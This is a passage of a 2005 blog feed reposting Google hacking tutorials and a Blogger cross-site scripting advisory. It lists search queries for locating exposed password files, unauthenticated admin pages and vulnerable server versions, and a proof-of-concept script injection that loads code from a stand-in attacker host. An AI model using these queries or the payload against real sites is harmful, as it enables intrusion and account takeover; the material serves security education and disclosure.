href='http://zone-d.blogspot.com/2005/02/tips-bikin-email-di-gmail.html' title='Tips Bikin Email Di Gmail'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110731069495725935</id><published>2005-02-02T10:13:00.000+08:00</published><updated>2005-02-02T10:18:14.956+08:00</updated><title type='text'>Google Hacking Mini-Guide #2</title><content type='html'>By Johnny Long.&lt;br /&gt;Google Automated ScanningGoogle frowns on automation: "You may not send automated queries of any sort to Google's system without express permission in advance from Google. Note that 'sending automated queries' includes, among other things:- using any software which sends queries to Google to determine how a web site or web page 'ranks' on Google for various queries;- 'meta-searching' Google; and- performing 'offline' searches on Google."Any user running an automated Google querying tool (with the exception of tools created with Google's extremely limited API) must obtain express permission in advance to do so. It's unknown what the consequences of ignoring these terms of service are, but it seems best to stay on Google's good side.GooscanGooscan is a UNIX (Linux/BSD/Mac OS X) tool that automates queries against Google search appliances (which are not governed by the same automation restrictions as their web-based brethren). For the security professional, gooscan serves as a front end for an external server assessment and aids in the information-gathering phase of a vulnerability assessment. For the web server administrator, gooscan helps discover what the web community may already know about a site thanks to Google's search appliance.For more information about this tool, including the ethical implications of its use, see &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com&lt;/a&gt;.GoogledorksThe term "googledork" was coined by the author and originally meant "An inept or foolish person as revealed by Google." After a great deal of media attention, the term came to describe those who "troll the Internet for confidential goods." Either description is fine, really. What matters is that the term googledork conveys the concept that sensitive stuff is on the web, and Google can help you find it. The official googledorks page lists many different examples of unbelievable things that have been dug up through Google by the maintainer of the page, Johnny Long. Each listing shows the Google search required to find the information, along with a description of why the data found on each page is so interesting.GooPotThe concept of a honeypot is very straightforward. According to &lt;a href="http://www.techtarget.com/"&gt;http://www.techtarget.com&lt;/a&gt;, "A honey pot is a computer system on the Internet that is expressly set up to attract and 'trap' people who attempt to penetrate other people's computer systems."To learn how new attacks might be conducted, the maintainers of a honeypot system monitor, dissect, and catalog each attack, focusing on those attacks that seem unique.An extension of the classic honeypot system, a web-based honeypot or "page pot" (click here to see what a page pot may look like) is designed to attract those employing the techniques outlined in this article. The concept is fairly straightforward. Consider a simple googledork entry like this:inurl:admin inurl:userlistThis entry could easily be replicated with a web-based honeypot by creating an index.html page that referenced another index.html file in an /admin/userlist directory. If a web search engine such as Google was instructed to crawl the top-level index.html page, it would eventually find the link pointing to /admin/userlist/index.html. This link would satisfy the Google query of inurl:admin inurl:userlist, eventually attracting a curious Google hacker.The referrer variable can be inspected to figure out how a web surfer found a web page through Google. This bit of information is critical to the maintainer of a page pot system, because it outlines the exact method the Google searcher used to locate the page pot system. The information aids in protecting other web sites from similar queries.GooPot, the Google honeypot system, uses enticements based on the many techniques outlined in the googledorks collection and this document. In addition, the GooPot more closely resembles the juicy targets that Google hackers typically go after. Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover new search types and to publicize them in the form of googledorks listings, creating a self-sustaining cycle for learning about and protecting from search engine attacks.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110731069495725935?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110731069495725935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110731069495725935' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110731069495725935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110731069495725935'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-hacking-mini-guide-2.html' title='Google Hacking Mini-Guide #2'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730914915445601</id><published>2005-02-02T09:49:00.000+08:00</published><updated>2005-02-02T10:03:13.483+08:00</updated><title type='text'>Google Hacking Mini-Guide</title><content type='html'>( &lt;a href="http://www.peachpit.com/articles/article.asp?p=170880"&gt;http://www.peachpit.com/articles/article.asp?p=170880&lt;/a&gt; )&lt;br /&gt;By Johnny Long.&lt;br /&gt;Using search engines such as Google, "search engine hackers" can easily find exploitable targets and sensitive data. This article outlines some of the techniques used by hackers and discusses how to prevent your site from becoming a victim of this form of information leakage.Other Articles By Johnny Long.&lt;br /&gt;The Google search engine found at &lt;a href="http://www.google.com/"&gt;http://www.google.com/&lt;/a&gt; offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google hacking." The intent of this article is to educate web administrators and the security community in the hopes of eventually stopping this form of information leakage. This document is an excerpt of the full Google Hacker's Guide published by Johnny Long, and located at &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com/&lt;/a&gt;.&lt;br /&gt;Basic Search TechniquesSince the Google web interface is so easy to use, I won't describe the basic functionality of the &lt;a href="http://www.google.com/"&gt;http://www.google.com/&lt;/a&gt; web page. Instead, I'll focus on the various operators available:&lt;br /&gt;Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.&lt;br /&gt;To search for a phrase, supply the phrase surrounded by double quotes (" ").&lt;br /&gt;A period (.) serves as a single-character wildcard.&lt;br /&gt;An asterisk (*) represents any word—not the completion of a word, as is traditionally used.&lt;br /&gt;Google advanced operators help refine searches. Advanced operators use a syntax such as the following:&lt;br /&gt;operator:search_termNotice that there's no space between the operator, the colon, and the search term.&lt;br /&gt;The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.&lt;br /&gt;The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.&lt;br /&gt;The link: operator instructs Google to search within hyperlinks for a search term.&lt;br /&gt;The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.&lt;br /&gt;The intitle: operator instructs Google to search for a term within the title of a document.&lt;br /&gt;The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.&lt;br /&gt;Google Hacking Mini-GuideBy Johnny Long.Date: May 7, 2004.Google Hacking TechniquesBy using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking.&lt;br /&gt;Site MappingTo find every web page Google has crawled for a specific site, use the site: operator. Consider the following query:&lt;br /&gt;site:http://www.microsoft.com microsoftThis query searches for the word microsoft, restricting the search to the &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt; web site. How many pages on the Microsoft web server contain the word microsoft? According to Google, all of them! Google searches not only the content of a page, but the title and URL as well. The word microsoft appears in the URL of every page on &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt;. With a single query, an attacker gains a rundown of every web page on a site cached by Google.&lt;br /&gt;There are some exceptions to this rule. If a link on the Microsoft web page points back to the IP address of the Microsoft web server, Google will cache that page as belonging to the IP address, not the &lt;a href="http://www.microsoft.com/"&gt;http://www.microsoft.com/&lt;/a&gt; web server. In this special case, an attacker would simply alter the query, replacing the word microsoft with the IP address(es) of the Microsoft web server.&lt;br /&gt;Finding Directory ListingsDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.&lt;br /&gt;Locating directory listings with Google is fairly straightforward. Figure 1 shows that most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be intitle:index.of, which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:&lt;br /&gt;Index of Native American Resources on the Internet&lt;br /&gt;LibDex—Worldwide index of library catalogues&lt;br /&gt;Iowa State Entomology Index of Internet Resources&lt;br /&gt;Judging from the titles of these documents, it's obvious that not only are these web pages intentional, they're also not the directory listings we're looking for. Several alternate queries provide more accurate results:&lt;br /&gt;intitle:index.of "parent directory"intitle:index.of name sizeThese queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files of directories located in directory listings.&lt;br /&gt;Versioning: Obtaining the Web Server Software/VersionThe exact version of the web server software running on a server is one piece of information an attacker needs before launching a successful attack against that web server. If an attacker connects directly to that web server, the HTTP (web) headers from that server can provide this essential information. It's possible, however, to retrieve similar information from Google's cache without ever connecting to the target server under investigation. One method involves using the information provided in a directory listing.&lt;br /&gt;This example was gathered using the following query:&lt;br /&gt;intitle:index.of server.atThis query focuses on the term index of in the title and server at appearing at the bottom of the directory listing. This type of query can also be pointed at a particular web server:&lt;br /&gt;intitle:index.of server.at site:aol.comThe result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com both run Apache web servers.&lt;br /&gt;It's also possible to determine the version of a web server based on default pages installed on that server. When a web server is installed, it generally will ship with a set of default web pages, like the Apache 1.2.6.&lt;br /&gt;These pages can make it easy for a site administrator to get a web server running. By providing a simple page to test, the administrator can simply connect to his own web server with a browser to validate that the web server was installed correctly. Some operating systems even come with web server software already installed. In this case, an Internet user may not even realize that a web server is running on his machine. This type of casual behavior on the part of an Internet user will lead an attacker to rightly assume that the web server is not well maintained, and by extension is insecure. By further extension, the attacker can assume that the entire operating system of the server may be vulnerable by virtue of poor maintenance.&lt;br /&gt;The following table provides a brief rundown of some queries that can locate various default pages.&lt;br /&gt;Apache Server Version Query Apache 1.3.0–1.3.9 Intitle:Test.Page.for.Apache It.worked! this.web.site! Apache 1.3.11–1.3.26 Intitle:Test.Page.for.Apache seeing.this.instead Apache 2.0 Intitle:Simple.page.for.Apache Apache.Hook.Functions Apache SSL/TLS Intitle:test.page "Hey, it worked !" "SSL/TLS-aware" Many IIS servers intitle:welcome.to intitle:internet IIS Unknown IIS server intitle:"Under construction" "does not currently have" IIS 4.0 intitle:welcome.to.IIS.4.0 IIS 4.0 allintitle:Welcome to Windows NT 4.0 Option Pack IIS 4.0 allintitle:Welcome to Internet Information Server IIS 5.0 allintitle:Welcome to Windows 2000 Internet Services IIS 6.0 allintitle:Welcome to Windows XP Server Internet Services Many Netscape servers allintitle:Netscape Enterprise Server Home Page Unknown Netscape server allintitle:Netscape FastTrack Server Home Page&lt;br /&gt;Using Google as a CGI ScannerTo accomplish its task, a CGI scanner must know what exactly to search for on a web server. Such scanners often utilize a data file filled with vulnerable files and directories like the one shown below:&lt;br /&gt;/cgi-bin/cgiemail/uargg.txt&lt;br /&gt;/random_banner/index.cgi&lt;br /&gt;/random_banner/index.cgi&lt;br /&gt;/cgi-bin/mailview.cgi&lt;br /&gt;/cgi-bin/maillist.cgi&lt;br /&gt;/cgi-bin/userreg.cgi&lt;br /&gt;/iissamples/ISSamples/SQLQHit.asp&lt;br /&gt;/iissamples/ISSamples/SQLQHit.asp&lt;br /&gt;/SiteServer/admin/findvserver.asp&lt;br /&gt;/scripts/cphost.dll/cgi-bin/finger.cgi&lt;br /&gt;Combining a list like this one with a carefully crafted Google search, Google can be used as a CGI scanner. Each line can be broken down and used in either an index.of or inurl search to find vulnerable targets. For example, a Google search for this:&lt;br /&gt;allinurl:/random_banner/index.cgi&lt;br /&gt;A hacker can take sites returned from this Google search, apply a bit of hacker "magic," and eventually get the broken random_banner program to cough up any file on that web server, including the password file.&lt;br /&gt;Note that actual exploitation of a found vulnerability crosses the ethical line, and is not considered mere web searching.&lt;br /&gt;Of the many Google hacking techniques we've looked at, this technique is one of the best candidates for automation, because the CGI scanner vulnerability files can be very large. The gooscan tool, written by j0hnny, performs this and many other functions. Gooscan and automation are discussed below.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110730914915445601?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730914915445601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730914915445601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730914915445601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730914915445601'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-hacking-mini-guide.html' title='Google Hacking Mini-Guide'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730886633553900</id><published>2005-02-02T09:43:00.000+08:00</published><updated>2005-02-02T09:47:46.336+08:00</updated><title type='text'>Advanced Google Hacking</title><content type='html'>I am in no way, shape, or form responsible for what you do with this information, this information is soley for educational purposes only.&lt;br /&gt;Introduction&lt;br /&gt;Well, you look at the title and I’m sure your all like “Not another google hacking tutorial…”. You might all think that google hacking is pretty much dead, admins have gotten smart. Well, the fact of the matter is, Google hacking is very far from dead, and a lot of admins are super far from being smart. The new virus that uses google’s searching power to find vulnerable sites just proves this point.&lt;br /&gt;Now I have realized that there is a good tutorial on Google Hacking on AO already, and if you have not seen it you can find it here:&lt;br /&gt;&lt;a href="http://www.antionline.com/showthrea...did=257512"&gt;http://www.antionline.com/showthrea...did=257512&lt;/a&gt;&amp;amp;&lt;br /&gt;This tutorial is different then that one and many others though, I am not simply going to show you what google can be used for, that has already been covered a ton of times. I am not going to simply show you “Index of” +htpasswd either, that to has been shown tons of times. I’m not going to teach you basic google operators and commands. Those have already been covered numerous times on AO and on google itself. They can be found here:&lt;br /&gt;&lt;a href="http://www.google.com/help/refinesearch.html"&gt;http://www.google.com/help/refinesearch.html&lt;/a&gt;&lt;br /&gt;and here:&lt;br /&gt;&lt;a href="http://www.google.com/help/operators.html"&gt;http://www.google.com/help/operators.html&lt;/a&gt;&lt;br /&gt;So What The Hell Is This Tutorial About?&lt;br /&gt;In this tutorial I am going to cover an advanced side to google hacking… If that makes sense… I see a lot of google tutorials telling you to go for the “Index of” +htpasswd and other password files. Most of these are shadowed anyway. Well, I’m going to base this tutorial on combinations. That’s right, combinations.&lt;br /&gt;Combinations&lt;br /&gt;You can’t Google Hack like you used to these days. A couple years ago all you had to do was search for inurl:admin.asp and you would have gotten hundreds of sites that were vulnerable. But these days that just gives you a bunch of crap, like companies trying to sell you their administrator software and such… Now you have to think of a combination of search commands and keywords to craft together to get what you want.&lt;br /&gt;Now lets think about this for a minute… What exactly do we want? Admin login pages? Nah… Password lists? Maybe but… nah… Ah! I know… Lets try for administration pages! You know, the pages that allow the administrator to edit, delete, and configure things on their website?First things first, we need a base keyword, how about :&lt;br /&gt;inurl:edit&lt;br /&gt;Not much luck. Lets try adding something to it, but what? We obviously want something that will edit a site. How about we add +intitle:admin to the search?&lt;br /&gt;inurl:edit +intitle:admin&lt;br /&gt;Hmm... Doesn't look good. Looks like just a bunch of manuals and instructions. You might find something there but doubtful, there's just to much junk there. Looks like we need to add in a couple of things. Lets look for a specific file extention. We do this with the filetype command. How about we add the command filetype:asp.&lt;br /&gt;inurl:edit +intitle:admin +filetype:asp&lt;br /&gt;Now what we are doing is searching for only files that are asp's and have "edit" in the url and "admin" in the title. We enter this in google and we do get some administration areas, but there is still alot of demos and manuals and other junk. We also get alot of Admin login's, which aren't bad, but we want to bypass the login screen. How do we do that? Well lets add a -login -password to the search:&lt;br /&gt;inurl:edit +intitle:admin +filetype:asp -login -password&lt;br /&gt;BINGO! This search gives you a bunch of sites that you can get admin access to. We are happy with those results, but you should try to spice things up a bit. Like adding quotes and *'s to some things:&lt;br /&gt;inurl:"*edit*" +intitle:"*admin*" +filetype:asp -login -password&lt;br /&gt;This gives you some other intersting things as well. I think everyone knows what the quotes do, but I don't think alot of people know what the *'s do. Well, when they are added that means as long as "edit" is within ANYTHING google will show it. Like for instance:&lt;br /&gt;inurl:"*edit*"&lt;br /&gt;Might bring up a site with the url as /frontpage_edit .asp. Get the point? This could be used to find a certain software your trying to exploit. For example:&lt;br /&gt;intext:"Powered by*"&lt;br /&gt;The possibilities are endless!&lt;br /&gt;Conclusion&lt;br /&gt;Well, thats that. I wrote this tutorial to kind of be an extension of the one written before here on AO and to once again show the power of google and at the same time show that google hacking is not dead. There is so much more to explain, so many other ways to do such things and even more! Go and explore on your own using different combinations. Look at all the poorly configured sites. But don't exploit them! Just because you can copy and paste that search string and then find a vulnerable site and deface them or steal information does not make you some super l33t h4ck3r d00d. I almost didn't write this tutorial because I was afraid it would to easy for a dishonest person on this site to mess things up. We don't need any more skiddies defacing sites and yappin their gums off about their political views (dr. toker will agree ). If you want to be a true white hat contact the admin and tell him of his problem.&lt;br /&gt;BTW, if you guys were interested, that worm that used google to spread did a real number! Google this:&lt;br /&gt;intitle:"This site is defaced!!!" intext:"NeverEverNoSanity WebWorm generation"&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110730886633553900?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730886633553900/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730886633553900' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730886633553900'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730886633553900'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/advanced-google-hacking.html' title='Advanced Google Hacking'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110730843292292000</id><published>2005-02-02T09:33:00.000+08:00</published><updated>2005-02-02T09:40:32.923+08:00</updated><title type='text'>Google as a Hacking Tool</title><content type='html'>This tutorial is an introduction to the security risks associated with common internet search engines. In the past few years, Google has come to be the most popular search engine in the world, so much so that many consider it the only one worth using. For this reason this tutorial will focus on Google, however it can be safely assumed that most of what is said here applies to other similar engines as well.&lt;br /&gt;WEB VULNERABILITIES&lt;br /&gt;A system is vulnerable when an attacker is able to make it do something it's not supposed to. There are generally two types of vulnerabilities to be found on the web: software vulnerabilities and user misconfigurations.&lt;br /&gt;Although there are some sophisticated attackers who target a specific system and try to discover vulnerabilities which will allow them access, the vast majority of attackers start out with a specific software vulnerability or common user misconfiguration which they already know how to exploit, and simply try to find - or scan for - systems which have this vulnerability. Google is of limited use to the first attacker, but invaluable to the second, as will be explained in the next section.&lt;br /&gt;SCANNERS&lt;br /&gt;When an attacker knows the sort of vulnerability they want to exploit but have no specific target, they employ a scanner. This is a program which automates the process of examining a massive quantity of systems for a security flaw. The earliest computer related scanner, for example, was a wardialer; a program which would dial long lists of phone numbers and record which ones responded with a modem handshake.&lt;br /&gt;Today there are scanners which automatically query IP addresses to see what ports they have open, determine what operating system they're probably running, some even determine the geographic location of the system. One of the most popular IP scanners is NMap ( &lt;a href="http://www.insecure.org/"&gt;http://www.insecure.org&lt;/a&gt; ). When using NMap, one specifies a range of hosts and the specific services on each one to scan for. The program will then return a list of the available (and presumably vulnerable) systems.&lt;br /&gt;GOOGLE AS A SCANNER&lt;br /&gt;With a little creativity, Google can be made to operate in a similar way as NMap, though they use different protocols. As an example, let's pretend that we know a great new exploit that will allow us to steal credit card information from any online store that uses the SHOP.PL scripts. We know that &lt;a href="http://www.secure.com/"&gt;www.secure.com&lt;/a&gt; uses SHOP.PL, but when we try our exploit it turns out that they already patched the vulnerability. As dedicated malicious hackers, though, we don't give up. We turn to Google and enter the following search string:&lt;br /&gt;inurl:shop.pl&lt;br /&gt;Feel free to try this - it's not illegal and shouldn't get you in to trouble. Note that the above search employs advanced operators, which are described here: ( &lt;a href="http://www.google.com/help/operators.html"&gt;http://www.google.com/help/operators.html&lt;/a&gt; ). What is produced is a list of all sites which have "shop.pl" somewhere in their URL, essentially a list of potentially vulnerable targets. Just as with NMap, all that's left to do is try our exploit against each site on the list.&lt;br /&gt;There are countless variations on this scheme, including some rather clever ways to find particular versions of server programs. For example, if one was to enter:&lt;br /&gt;"seeing this instead" intitle:"test page for apache"&lt;br /&gt;It would return a list of sites using Apache 1.3.11 - 1.3.26, because those specific phrases are used on the default page for those versions. Once again, if an attacker had an exploit for Apache 1.3.11 - 1.3.26, it would take very little effort to compromise a large number of systems.&lt;br /&gt;GOOGLE AS AN EXPLOITER&lt;br /&gt;It seems ridiculous, but sometimes administrators misconfigure their sites so badly, it's not even neccessary to use a "third party" exploit in order to gain access to a system. Google indexes the web very aggressively, and unless a file is put behind in a password or otherwise access-restricted area of your website, there is a good chance that it will be searchable in Google. This includes password files, credit reports, medical records, etc.&lt;br /&gt;In cases where the files are not adequately protected from Google, the search engine has basically already performed the exploit for the attacker. If, for example, a script kiddie wanted to deface a random web site, he or she would simply search for:&lt;br /&gt;intitle:"Index of" htpasswd&lt;br /&gt;Which would return a list of all poor users who allowed Google to index their .htpasswd file, probably containing the administrative username and password for their web page. All the attacker would need to do is open the file, crack the password, and deface away.&lt;br /&gt;GOOGLE AS A PROXY&lt;br /&gt;A proxy is an intermediary system which an attacker can use to disguise his or her identity. For example, if I was to gain remote access to Bill Gates' computer and cause it to run attacks on cia.gov, it would appear to the Feds that Bill Gates was hacking them. His computer would be acting as a proxy. Google can be used in a similar way, as is explained here.&lt;br /&gt;Even if Google didn't provide such an easy way to locate vulnerabilities, there are other tools which can do that particular job. A program called AccessDiver ( &lt;a href="http://www.accessdiver.com/"&gt;http://www.accessdiver.com/&lt;/a&gt; ) allows the user to specify a domain name, and it tries to access URLs which commonly lead to sensitive data or system access. This tool was, however, intended for use by administrators on their own networks. If anyone tried to use this tool against cia.gov, the system would deny them access, log their IP, and send them to jail for attempted computer trespass.&lt;br /&gt;When using Google, there is very little danger of detection, because the attackers computer doesn't have to access every site itself and ask suspicious questions like "Do you have a page containing .htpasswd?" The search engine has already gathered this information and will give it freely without a peep to the vulnerable site. Things get even more interesting when you consider the Google cache function. If you have never used this feature, try this:&lt;br /&gt;Do a Google search for "USA Today". Click on the first result and read a few of the headlines. Now click back to return to your search. This time, click the "Cached" link to the right of the URL of the page you just visited. Notice anything weird? You're probably looking at the headlines from yesterday or the day before. Why, you ask? It's because whenever Google indexes a page, it saves a copy of the entire thing to its server. You are accessing the most recent copy Google made of &lt;a href="http://www.usatoday.com/"&gt;www.usatoday.com&lt;/a&gt;.&lt;br /&gt;This can be used for a lot more than reading old newspapers. Our attacker can now use Google to scan for sensitive files without alerting potential targets, and even when a target is found the attacker can access it's files from the Google cache without ever making contact with the target's server. The only server with any logs of the attack would be Google's, and it's unlikely they will realize an attack has taken place.&lt;br /&gt;An even more elaborate trick involves crafting a special URL that would not normally be indexed by Google, perhaps one involving a buffer overflow or SQL injection (common web exploits). This URL is then submitted to Google as a new web page at ( &lt;a href="http://www.google.com/addurl.html"&gt;http://www.google.com/addurl.html&lt;/a&gt; ). Google automatically accesses it, stores the resulting data in it's searchable cache, and the rest is history.&lt;br /&gt;SECURING AGAINST GOOGLE EXPLOITS&lt;br /&gt;This probably doesn't even have to be mentioned at this point, but make sure you are comfortable with sharing everything in your public web folder with the whole world, because Google will share it, whether you like it or not. Also, in order to prevent attackers from easily figuring out what server software you are running, change the default error messages and other identifiers. Often, when a "404 Not Found" error is detected, servers will return a page like this:&lt;br /&gt;quote: Not FoundThe requested URL /cgi-bin/xxxxxx was not found on this server.&lt;br /&gt;Apache/1.3.27 Server at &lt;a href="http://www.countrybookshop.co.uk/"&gt;www.countrybookshop.co.uk&lt;/a&gt; Port 80&lt;br /&gt;The only information that the legimitate user really needs is on the top line, and restricting the other information will prevent your page from turning up in an attacker's search for a specific flavour of server.&lt;br /&gt;The Google cache issue raises another interesting security concern: just because you take a document off your site doesn't mean it's inaccessible. Google periodically purges it's cache, but until then your sensitive files are still being happily offered to the public. If you realize that the search engine has cached files which you want to be unavailable, go to ( &lt;a href="http://www.google.com/remove.html"&gt;http://www.google.com/remove.html&lt;/a&gt; ) and follow the instructions to remove your page, or parts of your page, from their database.&lt;br /&gt;There is not really anything that an administrator can do to prevent the use of Google as a proxy, so the best thing to do is ensure that your system is not vulnerable to any HTTP attacks that could be conducted through Google. A good HTTP vulnerability scanning tool is N-Stealth ( &lt;a href="http://www.nstalker.com/nstealth/"&gt;http://www.nstalker.com/nstealth/&lt;/a&gt; ). Run this against your network, and it will hopefully point out any holes that you need to patch up.&lt;br /&gt;OTHER RESOURCES&lt;br /&gt;There are many, many variations on the Google hacking techniques described here. An excellent place to find out more about these exploits is ( &lt;a href="http://johnny.ihackstuff.com/"&gt;http://johnny.ihackstuff.com/&lt;/a&gt; ). ( &lt;a href="http://www.oxygen-inc.com/google.html"&gt;http://www.oxygen-inc.com/google.html&lt;/a&gt; ) Also contains a pretty good tutorial specifically focusing on how to find sensitive information using Google.&lt;br /&gt;Hope this information is useful!&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110730843292292000?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110730843292292000/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110730843292292000' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730843292292000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110730843292292000'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/02/google-as-hacking-tool.html' title='Google as a Hacking Tool'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-10455602.post-110714890542322431</id><published>2005-01-31T13:18:00.000+08:00</published><updated>2005-01-31T13:21:45.423+08:00</updated><title type='text'>BLOGGER XSS VULNERABILITY</title><content type='html'>XSS DETAILS;&lt;br /&gt;There is no HTML filter when rendering user profiles. So anyone can inject a script into a profile's "First Name" "Last Name" etc.If you inject a code into "First Name" this will be print and run in users's first page [www.blogger.com], so an attacker can easily gain victim's account.&lt;br /&gt;Proof Of Concept;&lt;br /&gt; Inject [script src="&lt;a href="http://[attacker-server]/EVIL-JS/"&gt;http://[ATTACKER-SERVER]/EVIL-JS/"][/script&lt;/a&gt;] to victim "First Name" Now you can execute anything in remote. After login as your victim;    I. You can change password (without old password)   II. You can change e-mail address without any confirmation  III. You can own the victim blogs *Replace ][,&lt;&gt; *Script injection is limited to 50 characters (but it's pretty enough to add js script)&lt;br /&gt;HISTORY;-&lt;br /&gt;Discovered : 2/22/2004Vendor Informed : 2/25/2004Published : 3/26/2004&lt;br /&gt;VENDOR STATUS;&lt;br /&gt;Contact established with Google but there is no answer.Ferruh MavitunaWeb Application Security Specialist&lt;a href="http://ferruh.mavituna.com/"&gt;http://ferruh.mavituna.com&lt;/a&gt;ferruh[at]mavituna.com&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/10455602-110714890542322431?l=zone-d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://zone-d.blogspot.com/feeds/110714890542322431/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=10455602&amp;postID=110714890542322431' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110714890542322431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/10455602/posts/default/110714890542322431'/><link rel='alternate' type='text/html' href='http://zone-d.blogspot.com/2005/01/blogger-xss-vulnerability_30.html' title='BLOGGER XSS VULNERABILITY'/><author><name>dedbugs</name><uri>http://www.blogger.com/profile/06028860107166126725</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='21' height='32' src='http://photos1.flickr.com/4029512_a8bfbcb565_m.jpg'/></author><thr:total>0</thr:total></entry></feed>
